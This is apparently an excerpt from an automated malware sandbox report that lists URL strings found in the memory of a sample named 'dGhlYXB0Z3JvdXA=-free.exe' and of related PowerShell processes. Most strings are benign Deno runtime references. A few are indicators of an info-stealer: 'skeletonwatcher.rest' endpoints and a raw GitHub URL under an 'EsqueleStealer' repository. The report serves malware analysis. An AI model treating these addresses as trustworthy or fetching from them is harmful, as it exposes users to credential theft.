      Data Ascii: 6cdXmob.\[^!0(r"UZy-`8|f3#r|JWl(@:w3H0I]DJ-#T-*KAz*.<A8P?t=qh(l#Hy6IpCV+>HBRi&i+at&a>hAX-".^n`^B'3:1/qN
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: http://man7.org/linux/man-pages/man2/shutdown.2.html
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: http://my.json.host/data.json
      Source: powershell.exe, 00000003.00000002.2259938507.00000254C8F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2259938507.00000254C8DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C3901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.2234723049.00000254B8D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2359610362.000001638FC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skeletonwatcher.rest/api/get/free
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354926565.000001639157A000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360169025.000001639157A000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2357338443.000001639157A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skeletonwatcher.rest/api/get/free6
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2356660926.0000019908702000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://skeletonwatcher.rest/api/get/freeM
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
      Source: powershell.exe, 00000003.00000002.2234723049.00000254B8D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
      Source: powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/8520
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/8520turbo_fast_api_callsenable
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/manual
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/manual/linking_to_external_code/import_maps
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/manual/runtime/compiler_apis#denobundle).
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/examples/cat.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/examples/colors.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/examples/colors.tsGenerate
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/examples/welcome.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/fmt/colors.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/fs/utils.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/http/file_server.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/testing/asserts.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/x/
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/x/example/types.d.ts
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deno.land:80
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/)
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Compile
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Instanc
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErr
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Module)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Runtime
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compile
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/instant
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validat
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://dl.deno.land/canary-latest.txt
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://dl.deno.land/canary/
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://dl.deno.land/canary/P
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-invoke
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#concept-event-path-append
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#concept-shadow-including-inclusive-ancestor
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#event-path
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#get-the-parent
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://dom.spec.whatwg.org/#retarget
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#body-mixin
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-construct-readablestream
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-filtered-response-basic
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360315901.00000163915A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-heade
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-append
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-fill
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#concept-network-error
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#cors-safelisted-response-header-name
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#dom-headers
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#forbidden-response-header-name
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://github.com/Microsoft/TypeScript/issues/2577)
      Source: powershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://github.com/WICG/import-maps#the-import-mapSet
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/beatgammit/base64-js
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/beatgammit/base64-js/issues/42
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/bitinn/node-fetch/blob/master/src/headers.js
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.js
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/clap-rs/clap/issues
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://github.com/ctz/webpki-roots
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://github.com/denoland/deno/issues
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/denoland/deno/issues/4591)
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://github.com/denoland/deno/releases
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://github.com/denoland/deno/tree/master/test_plugin
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/github/fetch/blob/master/fetch.js
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/golang/go/blob/master/LICENSE
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/inexorabletash/text-encoding
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2340032549.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247169138.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247371351.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2356439385.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/vadimg/js_bintrees.
      Source: powershell.exe, 00000003.00000002.2234723049.00000254B99B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380C33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://golang.org/pkg/bytes/#Buffer).
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://golang.org/pkg/bytes/#Buffer.Grow).
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://golang.org/pkg/bytes/#Buffer.ReadFrom).
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://golang.org/pkg/io/#pkg-constants
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://myserver.com
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://no-color.org/
      Source: powershell.exe, 00000003.00000002.2259938507.00000254C8F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2259938507.00000254C8DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C3901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354239815.000001638FCCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2246660024.0000019908482000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt):
      Source: dGhlYXB0Z3JvdXA=-free.exe | String found in binary or memory: https://some/file.ts
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://streams.spec.whatwg.org/
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2046#section-5.1
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://url.spec.whatwg.org/#idna
